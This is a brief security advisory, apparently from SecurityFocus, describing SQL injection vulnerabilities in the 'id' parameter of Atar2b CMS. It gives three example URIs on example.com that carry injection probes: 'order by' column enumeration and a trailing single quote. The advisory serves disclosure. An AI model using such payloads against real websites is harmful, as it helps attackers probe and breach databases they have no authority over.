Atar2b CMS 'id' parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/gallery_e.php?id=118+order+by+10--

http://www.example.com/pageE.php?id=118+order+by+10--

http://www.example.com/pageH.php?id=104'


 

Privacy Statement
Copyright 2010, SecurityFocus